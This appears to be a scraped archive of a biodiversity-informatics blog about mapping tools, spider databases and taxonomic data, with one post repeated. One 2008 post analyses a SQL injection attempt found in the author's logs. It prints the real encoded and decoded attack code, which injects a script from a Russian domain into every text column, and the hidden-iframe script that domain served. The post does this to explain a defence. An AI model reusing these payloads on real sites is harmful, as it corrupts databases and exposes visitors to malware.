<em>Genetics</em>, <strong>27</strong>, 317-332.</p><p class="biblio-entry">Epling, C., Lewis, H., & Ball, F. M. (1960). The breeding group and seed storage: a study in population dynamics. <em>Evolution</em>, <strong>14</strong>, 238-255.</p><br />Similarly, this can be done with an input box. Paste a reference and press enter:<br /><input type="text" class="biblio-entry" style="width:90%;display:inline;height:1.5em;line-height:1.5em;" />

<h1>Authentication Made Easy</h1>
<p><i>2010-07-27</i></p>
I am swamped by the number of user names and passwords I have to remember and, quite frankly, if a new resource I stumble upon requires me to remember yet another account to access or do something I need, it's a deterrent and I'll go elsewhere. While developing features for <a href="http://www.simplemappr.net/">SimpleMappr</a>, it occurred to me that users would probably like to save a template of a naked map and then populate it with various bits of data at various times.
In other words, it would be handy to just draw up a template and use it whenever creating something new. Rather than making yet another user account system (ugh!) for this map-template-saving tool, I made use of <a href="http://www.janrain.com/">Janrain</a>'s (formerly RPX) OpenID system. In less than an hour, I made a 2-click authentication system for users. While Janrain is a for-profit company, it's only a matter of time before an open-source equivalent appears, at which time I can probably just switch and not have to adjust the database schema or much of my code.<br /><a href="http://www.simplemappr.net/"><img style="cursor: pointer; width: 320px; height: 201px;" src="http://2.bp.blogspot.com/_VYUFlXOCOxE/TE7ksB4VJ4I/AAAAAAAAAJw/FFWZHXlVk7E/s320/Picture+1.png" alt="" border="0" /></a>

<h1>SimpleMappr API</h1>
<p><i>2010-04-05</i></p>
There are plenty of resources to make pushpin maps, but none that I know of have a Microsoft Excel add-on to make use of them. My ultimate goal is to make one as part of <a href="http://www.simplemappr.net/">SimpleMappr</a> to help streamline map creation for assembly into manuscripts. To get a little closer to this vision, I spent a half-hour making a RESTful API; the documentation may be found here: <a href="http://www.simplemappr.net/#map-api">http://www.simplemappr.net/#map-api</a>.<br />
<br />
For example, this URL: http://www.simplemappr.net/api/?file=http://www.simplemappr.net/public/files/demo.txt&shape=square&size=10&color=255,0,0&width=400&bbox=-130,40,-60,50&layers=lakes,stateprovinces&projection=esri:102009<br />
<br />
Gives you this:<br />
<br />
<img src="http://www.simplemappr.net/api/?file=http://www.simplemappr.net/public/files/demo.txt&shape=square&size=10&color=255,0,0&width=400&bbox=-130,40,-60,50&layers=lakes,stateprovinces&projection=esri:102009" />

<h1>Mapping Revival</h1>
<p><i>2010-03-25</i></p>
One of the casualties of the death of the Nearctic Spider Database was a largely neglected, simple mapping application that permitted copy/paste of collection coordinates. The output was a b&w line map with contoured dots, mostly suitable for insertion in manuscripts. Sadly deficient was the ability to have many layers, each with a different pushpin style, or to crop, zoom, pan or change the projection. Unbeknown to me, folks were actually using this thing. I actually made a much better application for the AMNH to help produce outputs for their PBI grant holders. So, with Norm Platnick's permission, I re-purposed some of the code.<br /><br />Here be SimpleMappr: <a href="http://www.simplemappr.net">http://www.simplemappr.net</a>.<br /><br /><a href="http://www.simplemappr.net"><img style="display:block; margin:0px auto 10px; text-align:center; cursor:pointer; width: 400px; height: 268px;" src="http://1.bp.blogspot.com/_VYUFlXOCOxE/S6wOnLHKazI/AAAAAAAAAJo/i61kvoB21ws/s400/Picture+3.png" border="0" alt="" /></a><br /><br />There are bound to be bugs or hiccups because it's never been fully tested under load, but I throw it out here for feedback and feature requests. Please let me know what you were doing if and when you witness odd behaviour; this is a very dynamic environment. Yes, there are similar sorts of applications out there in the wilds, but none to my knowledge permit this sort of facile "copy/paste/tweak/export" as fast as this one can.

<h1>Nearctic Spider Database Dead</h1>
<p><i>2010-03-19</i></p>
With great sadness, I will no longer be serving the Nearctic Spider Database unless something remarkable happens.<br /><br />On March 17, 2010, the power supply sparked in my server, shorted out the motherboard and, as a consequence, the hard drives seized up. While I of course have back-ups, unbeknown to me the incremental drive image for the applications portion of the server was corrupt. The latest working drive image was from January 2007 - hardly useful for rebuilding the server. This means I have to reconstruct the server from bare metal, which would be a significant financial hit and a significant consumption of time away from family.<br /><br />The <a href="http://www.canadianarachnology.org">website currently serves</a> a flat html page where one may download the code and data until March 31, 2010, at which time it will evaporate.<br /><br />I estimate it would take a solid week to re-install and iron out the kinks. But, if it takes that long, surely it would be better to build a fool-proof system.
And, in particular, one NOT dependent on Microsoft software.<br /><br /><a href="http://3.bp.blogspot.com/_VYUFlXOCOxE/S6QpGlCuA3I/AAAAAAAAAJg/RJtAL9X6YcQ/s1600-h/banner2.png"><img style="cursor:pointer; width: 400px; height: 39px;" src="http://3.bp.blogspot.com/_VYUFlXOCOxE/S6QpGlCuA3I/AAAAAAAAAJg/RJtAL9X6YcQ/s400/banner2.png" border="0" alt="" /></a>

<h1>The Community is Dead</h1>
<p><i>2009-06-14</i></p>
This may not be much of a revelation to many, but it is a notion that has been sinking home more deeply for me of late. By "community", I don't necessarily mean the online community, though there are hints of that as well when you think of the MySpace->Facebook->Twitter progression from all-out friend fest to ever more insular and individualistic directions; I mean the taxonomic community.<br /><br />I lead the <a href="http://www.lifedesks.org">LifeDesk</a> application of the Encyclopedia of Life and have been trying to sell the notion of a taxa-centric "community" of taxonomists who have a desire to get their content online in a human- and machine-readable format. Banding together means the workload can be shared, <i>i.e.</i> you gather the images, I'll get the text, she'll get the names in order, and he'll get the bibliography, etc. This is a similar approach to the <a href="http://scratchpads.eu/">Scratchpad</a> philosophy. [Aside: there are apparently some who think Scratchpads and LifeDesks are duplicating efforts, but nothing could be further from the truth. Having both means choice, and that is a good thing because it strengthens both our directions and is a clear signal to taxonomists that there is something behind this.] While the Scratchpad/LifeDesk community-driven focus may work in a number of situations, it is by no means the rule. Rather, the chances are much greater that taxonomists don't have a taxa-centric community of colleagues to share the workload because, in fact, they may be the only one in the world working on their chosen taxa. As a result, the majority of Scratchpads and LifeDesks will be "communities" of single individuals. So, I have been thinking a little more deeply about the Scratchpad/LifeDesk direction and think I see a way forward.<br /><br />The clear signal from the Scratchpad/LifeDesks projects is that folks are doing primarily two things: 1) getting a biblio online, and 2) getting taxonomic names in order. These two activities are largely divorced from one another because the workflow leaves a lot to be desired. Both activities are thankless tasks to begin with, regardless of the LifeDesks/Scratchpad environment, which adds further insult to the workflow. Why <span style="font-style:italic;">should</span> these activities be so independent from one another? Here's what the workflow ought to be:<br /><br />1. Upload PDF reprints<br />2. Look for a DOI & get the metadata from CrossRef. If none is found, prompt with a citation form (first check for an existing paper in the db to cut down on duplicates)<br />3. Scan the PDFs using <a href="http://code.google.com/p/taxon-name-processing/">TaxonFinder</a><br />4. Present flat lists of names found in individual PDFs<br />5. Drag these into a <a href="http://www.jstree.com/">jsTree-based</a> classification manager while retaining the name-reprint link in the background
<br /><br />This is the workflow that makes sense, because when building a classification, one necessarily starts with publications, not some mythical list of names.<br /><br />But...<br /><br />Does the above make sense in a LifeDesk or a Scratchpad? It could certainly be a cool tool to help lower the bar of entry, but I seriously doubt it would get the traction in the taxonomic "community" that the tool would deserve. Rather, the application is best placed on the desktop as a rich, cross-platform app in <a href="http://www.adobe.com/products/air/">Adobe AIR</a> or a similarly facile environment to develop in. Roll in some BitTorrent capabilities (ee gads!) and you have the start of a mechanism whereby reprints, names AND classifications may be shared, and one could walk among the three in various ways. It would work because taxonomists need reprints and names, AND there are plenty of residual names in any one reprint (i.e. of use to someone else). If cleverly constructed, reconciliation of names is an insular exercise that happens on the desktop (as it always has been), but the sharing of these reconciliation groups / biblio metadata acts to enhance the findability of reprints.<br /><br />Here's the challenge then. Build a service that accepts PDF reprints, finds the DOI (if present) & spits back the citation metadata for the article AND all the names (dedup'd and cleaned) they contain. I don't need any more taxonomic intelligence than that. Give it to me in JSON and I can whip up the jsTree-based interface to help individuals build their own reconciliation groups...all linked to reprints in their store.
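Something like this would do; every field name below is my own invention, purely for the sake of argument:<br />
<br />
<pre><code>
{
  "citation" : {
    "doi"     : "10.xxxx/xxxxx",
    "title"   : "Revision of some genus or other",
    "journal" : "Some Journal of Systematics",
    "year"    : 2009
  },
  "names" : [
    { "verbatim" : "Araneus diadematus Clerck, 1757", "canonical" : "Araneus diadematus" },
    { "verbatim" : "Araneidae", "canonical" : "Araneidae" }
  ]
}
</code></pre>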
<h1>Cooliris on Eight Legs</h1>
<p><i>2008-12-18</i></p>
<a href="http://1.bp.blogspot.com/_VYUFlXOCOxE/SUs03KA_eXI/AAAAAAAAAIg/U5wIXkbI20Q/s1600-h/cool.jpg"><img style="cursor:pointer; width: 400px; height: 246px;" src="http://1.bp.blogspot.com/_VYUFlXOCOxE/SUs03KA_eXI/AAAAAAAAAIg/U5wIXkbI20Q/s400/cool.jpg" border="0" alt="" /></a><br />For well over a year, I have been serving MediaRSS feeds from the Nearctic Spider Database (before Yahoo and Flickr!) and I am overjoyed to see that all the big guys are jumping on this extension to RSS 2.0. One in particular that blows me away is Cooliris, a plug-in for all modern browsers that allows one to navigate MediaRSS feeds in 3D. So, if you haven't yet downloaded and installed Cooliris, you may do so <a href="http://www.cooliris.com">HERE</a>. Then, you're welcome to see the feed of spiders <a href="http://www.canadianarachnology.org/data/canada_spiders/ImageSearch.asp">HERE</a>.<br /><br />Maybe I had better take a second look at <a href="http://www.rssbus.com/">RSSBus</a>...

<h1>Little E's</h1>
<p><i>2008-11-03</i></p>
Because I work for the Encyclopedia of Life (EOL) and because I can tinker on the Nearctic Spider Database, I have the opportunity to try out various approaches to help mobilize data. One thing that concerns me about the current relationship between EOL and its content partners is its near 1:1 nature. In other words, content partners that come onboard are encouraged to represent their data in one potentially massive XML document, much like a Google Sitemap. More information on what EOL would like to see future content partners produce can be found <a href="http://www.eol.org/content/page/help_build_eol">HERE</a>. A potential outside consumer of these data will have no idea where to retrieve this XML document. Thus, the relationship between EOL and its content partners is closed. That is, until EOL releases some web services.<br /><br /><a href="http://www.canadianarachnology.org/data/spiders/1966"><img style="float:left; margin:0 10px 10px 0; cursor:pointer; width: 372px; height: 400px;" src="http://1.bp.blogspot.com/_VYUFlXOCOxE/SQ-4yb9mLmI/AAAAAAAAAGE/nTs15-lMTTw/s400/Graphic1.png" border="0" alt="" /></a>So, in an effort to help expose the data structure EOL is looking for, I made a link on every one of the species pages in the Nearctic Spider Database. Upon clicking these "little e's", you can catch a glimpse of what EOL is hoping its content partners will produce. These "little e's" don't really help the relationship between EOL and its array of content partners, nor do they ease the effort on the part of content partners to make these documents, nor do they help us at EOL. So what's the point? What they do is share what I produced for EOL. If you can parse the data behind the "little e's", you can parse the big XML "sitemap" document I made for EOL as well.<br /><br />The problem with sitemaps is that no one but the harvester knows where they can be found. A Google sitemap, for instance, can be found in any folder on a website that shares one (but is usually in the root folder and is accessed as /sitemap.xml or /sitemap.gz). The situation is the same for EOL and its content partners; the "sitemap" can be found anywhere.<br /><br />To finish off the "little e" approach, each page should have a link to the EOL content partner sitemap document, in which can be found links to all pages with "little e's". This would be somewhat similar to an OpenSearch document, where one finds instructions on how to make use of the search feed(s) available on a site. And of course, there should be a JSON option as a lighter-weight alternative to XML.<br /><br />But, to make this of any use at all, we need a desktop reader like an RSS reader...something with the ability to shunt the data into the correct spot within a rich GUI-based classification (with some degree of certainty), thus forcing us to eventually develop far better online tree browsers. With all the bits described above, you'd come across a species page, click a button like an RSS feed button, download a sitemap containing a list of all species pages on the site you landed on, then browse through the content the way you want it organized.
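In the same spirit, the JSON flavour of a "little e" might look something like the sketch below; the structure is invented for illustration and only loosely echoes what EOL actually asks of content partners:<br />
<br />
<pre><code>
{
  "taxon" : {
    "scientificName" : "Araneus diadematus",
    "source"         : "http://www.canadianarachnology.org/data/spiders/1966",
    "commonNames"    : [ { "name" : "cross orbweaver", "language" : "en" } ],
    "dataObjects"    : [ { "type" : "text", "subject" : "Description", "value" : "..." } ]
  }
}
</code></pre>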
<h1>Google Charts...Wow</h1>
<p><i>2008-10-18</i></p>
Kevin Pfeiffer, an avid participant in the <a href="http://forum.canadianarachnology.org/">Nearctic Arachnologists' Forum</a>, finally got me to do something about the Flash-based charts on the species pages in the Nearctic Spider Database. While these older charts were great at the time, they've had their day. So, in light of the sparklines that Rod Page integrated into a "<a href="http://iphylo.blogspot.com/2008/10/biodiversity-service-status.html">Biodiversity Service Status</a>" pinger, I thought I'd take a closer look at <a href="http://code.google.com/apis/chart/">Google Charts</a>. Wow. The added plus for this service is the truly stellar documentation.<br /><a href="http://2.bp.blogspot.com/_VYUFlXOCOxE/SPqS0qQ3e4I/AAAAAAAAAFs/xhlijbChSb0/s1600-h/chart.jpg"><img style="display:block; margin:0px auto 10px; text-align:center; cursor:pointer;" src="http://2.bp.blogspot.com/_VYUFlXOCOxE/SPqS0qQ3e4I/AAAAAAAAAFs/xhlijbChSb0/s320/chart.jpg" border="0" alt="" /></a><br />Rather than using a terribly long URL to get the PNG for the chart, I used a proxy. This way, I can pass an identifier to a local script that then grabs the image and dumps it on the page. And, I can give the chart a file name of my choosing.

<h1>Long Tail of Biodiversity</h1>
<p><i>2008-10-12</i></p>
At last count on the World Spider Catalog, there are 4345 species in the spider family <a href="http://research.amnh.org/entomology/spiders/catalog/LINYPHIIDAE.html">Linyphiidae</a>. This is second only to the jumping spiders. The latter are primarily tropical and subtropical, but linyphiids are predominantly found in the northern hemisphere, where, coincidentally, most of the world's arachnid systematists are also found. And, of course, there's very little accessible information on most of these species either in print or on the web. A few notable exceptions are Tanasevitch's <a href="http://www.andtan.newmail.ru/list/">Linyphiid Spiders of the World</a>, which contains flat lists of names organized in various ways, and the ever popular <a href="http://bugguide.net/node/view/1969">BugGuide gallery</a> (few of whose images are identified to species). There is a smattering of other resources out there, but they are all hard to find. Both the <a href="http://tolweb.org/Linyphiidae">Tree of Life</a> and the <a href="http://www.eol.org/taxa/16098085">Encyclopedia of Life</a> have the equivalent of stub pages, so neither of these is particularly helpful.<br /><br /><a href="http://3.bp.blogspot.com/_VYUFlXOCOxE/SPINCM169kI/AAAAAAAAAFk/llxI0fatOWI/s1600-h/new-1.jpg"><img style="display:block; margin:0px auto 10px; text-align:center; cursor:pointer;" src="http://3.bp.blogspot.com/_VYUFlXOCOxE/SPINCM169kI/AAAAAAAAAFk/llxI0fatOWI/s320/new-1.jpg" border="0" alt="" /></a><br />A recent unlocking of these hidden gems is underway by <a href="http://fm1.fieldmuseum.org/aa/staff_page.cgi?staff=sierwald&id=629">Nina Sandlin</a>, an Associate of Zoology at the Field Museum in Chicago. She has been building <a href="http://picasaweb.google.com/nina.sandlin/LinEpig#">LinEpig</a>, a photo gallery of linyphiid epigyna on Picasa Web Albums. Like most other online work on arachnids, LinEpig is built with love for the organisms and no budget (correct me if I'm wrong, Nina!). While taking images of the epigyna, Nina graciously <a href="http://www.canadianarachnology.org/data/canada_spiders/ContributorImages.asp?Photographer=81">shared the habitus images</a> with the Nearctic Spider Database.
<h2>Long Tail of Biodiversity (2008-10-12)</h2>At last count on the World Spider Catalog, there are 4,345 species in the spider family <a href="http://research.amnh.org/entomology/spiders/catalog/LINYPHIIDAE.html">Linyphiidae</a>, second only to the jumping spiders. The latter are primarily tropical and subtropical, but linyphiids are predominantly found in the northern hemisphere, where are coincidentally found most of the world's arachnid systematists. And, of course, there's very little accessible information on most of these species, either in print or on the web. A few notable exceptions are Tanasevitch's <a href="http://www.andtan.newmail.ru/list/">Linyphiid Spiders of the World</a>, which contains flat lists of names organized in various ways, and the ever popular <a href="http://bugguide.net/node/view/1969">BugGuide gallery</a> (few images of which are identified to species). There is a smattering of other resources out there, but they are all hard to find. Both the <a href="http://tolweb.org/Linyphiidae">Tree of Life</a> and the <a href="http://www.eol.org/taxa/16098085">Encyclopedia of Life</a> have the equivalent of stub pages, so neither is particularly helpful.<br /><br /><a href="http://3.bp.blogspot.com/_VYUFlXOCOxE/SPINCM169kI/AAAAAAAAAFk/llxI0fatOWI/s1600-h/new-1.jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://3.bp.blogspot.com/_VYUFlXOCOxE/SPINCM169kI/AAAAAAAAAFk/llxI0fatOWI/s320/new-1.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5256278046553077314" /></a><br />A recent unlocking of these hidden gems is underway by <a href="http://fm1.fieldmuseum.org/aa/staff_page.cgi?staff=sierwald&id=629">Nina Sandlin</a>, an Associate of Zoology at the Field Museum in Chicago. She has been building <a href="http://picasaweb.google.com/nina.sandlin/LinEpig#">LinEpig</a>, a photo gallery of linyphiid epigyna on Picasa Web Albums. Like most other online work on arachnids, LinEpig is built with love for the organisms and no budget (correct me if I'm wrong, Nina!). While taking images of the epigyna, Nina graciously <a href="http://www.canadianarachnology.org/data/canada_spiders/ContributorImages.asp?Photographer=81">shared the habitus images</a> with the Nearctic Spider Database. While in Chicago recently, I chatted with Nina about Picasa. While it comes close to what she wanted, it fell short in a number of areas. The most important, in my opinion, is findability: sure, she can tag her images with names, but her gallery is poorly exposed on Google and other search engines. Still, some features make Picasa attractive. It is relatively easy to upload, manage, and geotag images - though geotagging could evidently use text boxes for when one already has coordinates on hand. Most importantly, the interface is clean, responsive and uncluttered.<br /><br />Now the long tail...<br /><br />Prior to Nina's efforts, there was very little (if any) linyphiid imagery on the web, especially the specialized images of the epigyna, which are far more useful than the habitus images. If you've seen one linyphiid, you've pretty much seen them all (with a few exceptions, of course). They are remarkably similar in shape & size, but their sexual characters, especially the male's, are dramatically different. The big biodiversity aggregators like the Encyclopedia of Life have positioned themselves to present low-hanging fruit. That is, show the furry, charismatic megafauna (or fish), because there are many resources serving this sort of content. But why? Wouldn't it make more sense to provide better and more useful tools for folks like Nina, who create and organize content for which there is little or nothing available elsewhere? Let's hope that, in time, <a href="http://lifedesk.eol.org">LifeDesk</a> will provide a ladder for consumers of the content generated there to reach out to the furthest branches and leaves, where are found all the curiosities. But first, it'll have to contain tools and functionality useful for folks like Nina, and for others to jump in and give her a hand.<br /><br /><h2>Show Me...Crab Spiders on Bark (2008-07-25)</h2><a href="http://farm3.static.flickr.com/2297/2247720522_3f40b69687_m.jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px;" src="http://farm3.static.flickr.com/2297/2247720522_3f40b69687_m.jpg" border="0" alt="" /></a><br /><a href="http://farm1.static.flickr.com/169/467322234_6f0b28f676.jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px;" src="http://farm1.static.flickr.com/169/467322234_6f0b28f676.jpg" border="0" alt="" /></a><br />One of the DarwinCore elements for specimen and observation data is "habitat". To my knowledge, not a lot has been done with these data. Either there are actually few records cached at GBIF that have this field filled, or the data are in such a mess as to be (mostly) unusable. I certainly hope it's not the latter. No matter how messy, there is still a wealth of information here if one takes the time to sift through it. The data are not unlike folksonomies, and someone with more patience than me could probably develop a natural classification of these terms.
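As a hedged sketch of what that sifting might look like (plain JavaScript; the sample string and stop list are mine, and real habitat strings are far messier):<br /><blockquote>// Reduce a free-text DarwinCore "habitat" string to candidate facet terms.<br />var STOP = ['in', 'on', 'of', 'the', 'under', 'near', 'at', 'with'];<br /><br />function habitatTerms(habitat) {<br />return habitat.toLowerCase().split(/[^a-z]+/).filter(function (t) {<br />return t.length > 2 && STOP.indexOf(t) === -1;<br />});<br />}<br /><br />habitatTerms('Under loose bark of dead pine, mixed forest');<br />// -> ['loose', 'bark', 'dead', 'pine', 'mixed', 'forest']</blockquote>Tally those terms across a few million records and the folksonomy, however messy, starts to look like raw material for a controlled vocabulary.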
Faceted search is a first crack at making these data useful, because it offers more trajectories into the data than we would have without using them at all. For a first cut, I pulled 30 random contributed specimen records for each species in the Nearctic Spider Database and merely display their full habitat contents on the species pages. Then, I index the pages as always using my trusty <a href="http://www.wrensoft.com/zoom/">Zoom Search</a>. Voila: a quick way to do some rough, faceted searches. It's not perfect, but it's better than nothing. Where "crab spider bark" or "wolf spider beach" once produced no search results, there are now 5 and 17 results returned, respectively. Incidentally, Flickr produced 13 and 18 results, respectively, but many of those images are useless.<br /><br /><h2>Green Porno (2008-07-20)</h2>I couldn't resist sharing these. Pure genius. Kudos to Isabella Rossellini.<br /><br /><center><a href="http://www.sundancechannel.com/greenporno"><img src="http://arco.vo.llnwd.net/o2/cust9/FLV/640x480/original/green_porno/bumperstickers/gp_bumpersticker1.jpg" border="0" /></a></center><br /><br /><h2>SQL Injection Attacks! (2008-07-20)</h2>I was browsing through my web logs this morning and discovered some clever attempts to hack into my database using a technique called <a href="http://en.wikipedia.org/wiki/SQL_injection">SQL injection</a>. Here's a portion of one line in the web log:<br /><blockquote>/data/canada_spiders/AllReferences.asp Letter=F;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C...<strong>more crap here</strong>...4445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);--</blockquote><br />The semicolon after "Letter=F" above is an attempt to mark the close of the SQL within the page "/data/canada_spiders/AllReferences.asp"; everything after it is a payload that <em>could</em> be executed on the server. Had I constructed the SQL on that page as something like:<br /><blockquote>SELECT * FROM [TABLE] WHERE [COLUMN] = "" & [LETTER F] & ""</blockquote><br />...where [LETTER F] is the parameter passed from the URL, I would have exposed myself to something potentially serious. So, instead of:<br /><blockquote>SELECT * FROM [TABLE] WHERE [COLUMN] = "F"</blockquote><br />...the executed SQL would have been:<br /><blockquote>SELECT * FROM [TABLE] WHERE [COLUMN] = "F";DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C...<strong>more crap here</strong>...4445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);--</blockquote><br />Cool.<br /><br />So, just what is all that crap? Well, it's a SQL Server-specific bit of code that is HEX-encoded. The full decoded HEX is as follows:<br /><blockquote>DECLARE @T VARCHAR(255),@C VARCHAR(255) <br />DECLARE Table_Cursor CURSOR FOR<br />SELECT a.name,b.name FROM sysobjects a,syscolumns b<br />WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)<br />OPEN Table_Cursor<br />FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)<br />BEGIN<br />EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://www.bnrc.ru/ngg.js></script>''')<br />FETCH NEXT FROM Table_Cursor INTO @T,@C<br />END<br />CLOSE Table_Cursor<br />DEALLOCATE Table_Cursor</blockquote><br />Hmm. What does this mean? Well, it's an attempt to do something very scary: append a reference to a snippet of JavaScript to every text-type column of every user table in the database.
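(If you want to inspect such a blob yourself, decoding the hex is a one-liner in Node; the string below is just the opening bytes of the payload quoted above:)<br /><blockquote>// Decode the hex-encoded payload lifted from the web log (truncated here).<br />var hex = '4445434C415245204054205641524348415228323535292C';<br />console.log(Buffer.from(hex, 'hex').toString('latin1'));<br />// prints: DECLARE @T VARCHAR(255),</blockquote>The rest of the blob decodes the same way.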
So, the next time any data are pulled from the database for presentation on a website, there is the potential to include hundreds of references to a remote JavaScript file.<br /><br />So, what's in that JavaScript? This:<br /><blockquote>window.status="";<br />var cookieString = document.cookie;<br />var start = cookieString.indexOf("dssndd=");<br />if (start != -1){}else{<br />var expires = new Date();<br />expires.setTime(expires.getTime()+9*3600*1000);<br />document.cookie = "dssndd=update;expires="+expires.toGMTString();<br />try{<br />document.write("<iframe src=http://iogp.ru/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");<br />}<br />catch(e)<br />{<br />};<br />}</blockquote><br />OK, so an iframe is inserted. Cripes, will it ever end? What's in the iframe? A page with some obfuscated JavaScript that runs as the page renders. This is as far as I got. But others have also discovered this attack and note that the JavaScript in that iframe is at least a redirect to msn.com. If you conduct a search for "ngg.js", you can pull up a whole heap of sites indexed by Google that have apparently been affected by this SQL injection attack. So, if you visit a web site, click a link, and get mysteriously redirected to msn.com, something may have just happened to your browser.<br /><br />But, I still have no idea what the ultimate end game is. What the heck is in the obfuscated JavaScript in the iframe? Anyone?
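A postscript on defense: the generic fix for this entire class of attack is to stop concatenating user input into SQL strings and to use parameterized queries instead, so the Letter value travels as data rather than as code. A minimal sketch with the 'mssql' package for Node (the table and column names are invented for illustration; this shows the principle, not this site's actual ASP code):<br /><blockquote>const sql = require('mssql');<br /><br />// The user-supplied letter is bound to @letter, never spliced into the SQL text,<br />// so a payload like F;DECLARE @S VARCHAR(4000)... arrives as an inert string.<br />async function referencesByLetter(letter) {<br />const pool = await sql.connect('mssql://user:pass@localhost/spiders');<br />const result = await pool.request()<br />.input('letter', sql.VarChar(1), letter)<br />.query('SELECT * FROM SpiderReferences WHERE AuthorLetter = @letter');<br />return result.recordset;<br />}</blockquote>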
<h2>Google Geocodes (2008-07-19)</h2>Since I have been on a kick this weekend getting back into the mapping thing, I decided to see what was new in the world of the Google Maps API and discovered plenty of great new things. For example, folks have developed <a href="http://nicogoeminne.googlepages.com/documentation.html">reverse geocoders</a>. It's a shame, however, that the full <a href="http://www.iso.org/iso/country_codes/iso_3166_code_lists/english_country_names_and_code_elements.htm">ISO country names</a> aren't used; only the country codes are made available via <a href="http://code.google.com/apis/maps/documentation/services.html">Google's geocode API</a>. I would much rather have the full country name and the full "AdministrativeAreaName" (i.e., the state or province in Google Maps API parlance), because I could then use these in the AJAX data grid for contributors of specimen records to the Nearctic Spider Database. Similarly, applications like <a href="http://www.specifysoftware.org/Specify">Specify</a> could take advantage of this to help users clean or check their data as they are entered.<br /><br />Nevertheless, I tweaked my old <a href="http://www.canadianarachnology.org/data/canada_spiders/LocalitiesGeocoder.asp">Google Map Geocoder</a> to take advantage of all these advancements. The point of this little gadget is to click a map and get the location and coordinates. In this era of <a href="http://www.apple.com/iphone/features/maps.html">GPS units and iPhones</a>, this may be rather pointless. But it was fun to see what I could do in an hour or so.<br /><a href="http://www.canadianarachnology.org/data/canada_spiders/LocalitiesGeocoder.asp"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://2.bp.blogspot.com/_VYUFlXOCOxE/SII7ivYjSLI/AAAAAAAAAFc/3M6j9VqxgPs/s320/reversegeocode.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5224803985724229810" /></a><br /><br /><h2>Simple Mapper (2008-07-18)</h2>With the mapping craze of this past decade and the fascination with AJAX tiling, a serious deficiency has been a simple mechanism to produce a black & white line map with points marking collection locations, for use in an outgoing manuscript. While at the recent American Arachnological Society meetings at Berkeley, California, I casually mentioned in a presentation I gave about the Nearctic Spider Database that someone should make such a service. Well, I made one...at least the start of one, right <a href="http://www.canadianarachnology.org/data/canada_spiders/SimpleMapper.asp">HERE</a>.<br /><br />I know, I know, yet another mapping service. But this one serves a very specific purpose. It could no doubt be expanded and made more customizable, with different point styles for multiple species (a bit tougher) or an option to use a global map instead (trivial), but it's a start toward something that hopefully satisfies a very different need.<br /><br /><a href="http://www.canadianarachnology.org/data/canada_spiders/SimpleMapper.asp"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://4.bp.blogspot.com/_VYUFlXOCOxE/SIC2dcwoqDI/AAAAAAAAAFU/gTSjn1_HFOU/s320/mapserv.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5224376184802420786" /></a>
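The one bit of real arithmetic in such a service is projecting coordinates onto a fixed-size image; everything else is coastline data and drawing. A hedged sketch under a plate carrée (equirectangular) projection, which may or may not be the projection the service actually uses:<br /><blockquote>// Convert latitude/longitude to a pixel position on a width x height world map.<br />function toPixel(lat, lng, width, height) {<br />return {<br />x: Math.round((lng + 180) / 360 * width),<br />y: Math.round((90 - lat) / 180 * height)<br />};<br />}<br /><br />toPixel(53.5, -113.5, 720, 360); // Edmonton -> { x: 133, y: 73 }</blockquote>Plot those points over a pre-rendered black & white base map of the same dimensions and you have a manuscript-ready figure.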
<h2>Life Science Identifiers (LSIDs) - Why? (2008-05-12)</h2>The <a href="http://www.catalogueoflife.org">Catalogue of Life</a> (CoLP) recently released its 2008 checklist and has now implemented Life Science Identifiers (LSIDs). In the past, the Catalogue of Life changed its identifiers with every new version, forcing database owners who made use of CoLP names and identifiers to reconstruct their databases if they wished to maintain some sort of external link to an authoritative source.<br /><br />If you're not familiar with LSIDs, this from the sourceforge <a href="http://lsids.sourceforge.net/">LSID resolution project</a>:<br /><blockquote>Life Science Identifiers (LSIDs) are persistent, location-independent, resource identifiers for uniquely naming biologically significant resources including species names, concepts, occurrences, genes or proteins, or data objects that encode information about them. To put it simply, LSIDs are a way to identify and locate pieces of biological information on the web.</blockquote>This is how LSIDs are constructed:<br /><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://4.bp.blogspot.com/_VYUFlXOCOxE/SCgoA8FaVtI/AAAAAAAAAFM/Jez76kopY7o/s400/lsid-syntax-diagram.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5199449766393173714" /><br /><br />So, what can one do with an LSID? Well, given an LSID, one can fetch metadata for that data object. This assumes, of course, that the authority at the other end is alive and ready to serve the metadata. There is no central authority, as there is with the Digital Object Identifiers (DOIs) used by the publishing industry.<br /><br />For starters, one can resolve LSIDs using various online resources. Examples:<br /><ol><li>Biodiversity Information Standards (TDWG): <a href="http://lsid.tdwg.org/">LSID resolver</a></li><br /><li>Rod Page: <a href="http://linnaeus.zoology.gla.ac.uk/~rpage/lsid/tester/">LSID tester</a></li><br /></ol><br />Because of the distributed nature of LSID authorities (the system is ultimately based on DNS), there is of course nothing preventing the same taxon name from having multiple identifiers, or one authority from serving multiple LSIDs for the same taxon name. For example, the namestring for the fishing spider <a href="http://www.canadianarachnology.org/data/spiders/19664"><em>Dolomedes tenebrosus</em> Hentz, 1844</a> has no fewer than three LSIDs that resolve to three different authorities:<br /><br /><strong>uBio:</strong> urn:lsid:ubio.org:namebank:2072956<br /><strong>Catalogue of Life 2008:</strong> 